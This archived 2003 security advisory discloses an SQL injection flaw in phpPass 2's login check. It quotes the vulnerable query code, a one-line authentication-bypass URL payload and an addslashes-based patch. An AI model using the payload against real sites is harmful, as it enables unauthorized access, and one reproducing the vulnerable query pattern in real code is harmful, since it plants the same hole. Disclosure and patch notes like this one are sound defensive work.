20th Jan 2003 [SBWID-5937]
COMMAND
phpPass sql injection
SYSTEMS AFFECTED
phpPass 2
PROBLEM
Frog Man [leseulfrog@hotmail.com] found :
http://www.frog-man.org/tutos/phpPass.txt
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
accesscontrol.php :
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
session_unregister("uid");
session_unregister("pwd");
?>
<html>
<head>
<title> Access Denied </title>
[...]
exit;
[...]
------------------------------------------------
Exploit : °°°°°°°°°
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
SOLUTION
A patch can be found on http://www.phpsecure.org
Patch :
°°°°°°°
In accesscontrol.php, replace the lines :
-------------------------------------------------
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------
by :
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
